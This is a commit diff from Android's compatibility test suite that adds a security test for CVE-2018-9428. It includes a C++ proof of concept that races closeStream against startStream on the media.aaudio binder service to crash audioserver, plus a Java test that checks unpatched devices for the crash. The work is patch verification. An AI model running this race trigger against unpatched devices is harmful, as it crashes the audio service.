diff options
author | TreeHugger Robot <treehugger-gerrit@google.com> | 2020-10-01 00:25:10 +0000 |
---|---|---|
committer | Android (Google) Code Review <android-gerrit@google.com> | 2020-10-01 00:25:10 +0000 |
commit | a13b55cff17e1d605dcf2e07b90b2ebfe31aa61b (patch) | |
tree | d52ee537239c4cfa6547dc05bd037154313d8314 | |
parent | 1a01dbb46c6617a603fefdd1d7ff1ed2ffca68e4 (diff) | |
parent | f9e563b4c0a9fd084ff85e551abeba30ace0bf1f (diff) | |
download | cts-a13b55cff17e1d605dcf2e07b90b2ebfe31aa61b.tar.gz |
Merge "[RESTRICT AUTOMERGE] CTS test for Android Security b/74122779" into pi-dev
4 files changed, 126 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml index 3e7d2f6b9ff..cb88a2aa892 100644 --- a/hostsidetests/securitybulletin/AndroidTest.xml +++ b/hostsidetests/securitybulletin/AndroidTest.xml @@ -192,6 +192,7 @@ <!--__________________--> <!-- Bulletin 2018-07 --> <!-- Please add tests solely from this bulletin below to avoid merge conflict --> + <option name="push" value="CVE-2018-9428->/data/local/tmp/CVE-2018-9428" /> <option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" /> <!--__________________--> diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.mk new file mode 100644 index 00000000000..a886b57f4d5 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/Android.mk @@ -0,0 +1,34 @@ +# Copyright (C) 2020 The Android Open Source Project +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +LOCAL_PATH:= $(call my-dir) +include $(CLEAR_VARS) + +LOCAL_MODULE := CVE-2018-9428 +LOCAL_SRC_FILES := poc.cpp +LOCAL_MULTILIB := both +LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32 +LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64 +LOCAL_SHARED_LIBRARIES := libmedia +LOCAL_SHARED_LIBRARIES += libutils +LOCAL_SHARED_LIBRARIES += libbinder +LOCAL_SHARED_LIBRARIES += libaaudio + +# Tag this module as a cts test artifact +LOCAL_COMPATIBILITY_SUITE := cts sts vts +LOCAL_CTS_TEST_PACKAGE := android.security.cts + +LOCAL_ARM_MODE := arm +LOCAL_CPPFLAGS := -Wall -Werror -Wno-multichar -fpermissive +include $(BUILD_CTS_EXECUTABLE) diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp new file mode 100644 index 00000000000..84889ccb5f2 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9428/poc.cpp @@ -0,0 +1,77 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include <binder/IServiceManager.h> +#include <binder/IPCThreadState.h> +#include "binding/IAAudioService.h" + +using namespace android; +using namespace aaudio; + +typedef struct _thread_args { + aaudio_handle_t aaudioHandle; + sp<IAAudioService> aas; +} thread_args; + +static void* closeStreamThread(void *arg) { + thread_args *threadArgs = (thread_args*) arg; + if (threadArgs) { + if (threadArgs->aas) { + threadArgs->aas->closeStream(threadArgs->aaudioHandle); + } + } + return nullptr; +} + +static void* startStreamThread(void *arg) { + thread_args *threadArgs = (thread_args*) arg; + if (threadArgs) { + if (threadArgs->aas) { + threadArgs->aas->startStream(threadArgs->aaudioHandle); + } + } + return nullptr; +} + +int main() { + thread_args targs; + + sp < IServiceManager > sm = defaultServiceManager(); + sp < IBinder > binder = sm->getService(String16("media.aaudio")); + targs.aas = interface_cast < IAAudioService > (binder); + if (!(targs.aas)) { + return EXIT_FAILURE; + } + aaudio::AAudioStreamRequest request; + request.getConfiguration().setSharingMode(AAUDIO_SHARING_MODE_SHARED); + request.getConfiguration().setDeviceId(0); + request.getConfiguration().setSampleRate(AAUDIO_UNSPECIFIED); + + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + pthread_t pt[2]; + + aaudio::AAudioStreamConfiguration configurationOutput; + targs.aaudioHandle = targs.aas->openStream(request, + configurationOutput); + pthread_create(&pt[0], nullptr, closeStreamThread, &targs); /* close stream */ + pthread_create(&pt[1], nullptr, startStreamThread, &targs); /* start stream */ + + sleep(5); + } + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java index ad049f98603..0bcc694ded3 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java @@ -124,6 +124,20 @@ public class TestMedia extends SecurityTestCase { } /** + * b/74122779 + * Vulnerability Behaviour: SIGABRT in audioserver + */ + @SecurityTest(minPatchLevel = "2018-07") + @Test + public void testPocCVE_2018_9428() throws Exception { + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2018-9428", getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns("audioserver"); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } + + /** * b/23247055 * Vulnerability Behaviour: SIGABRT in self **/ |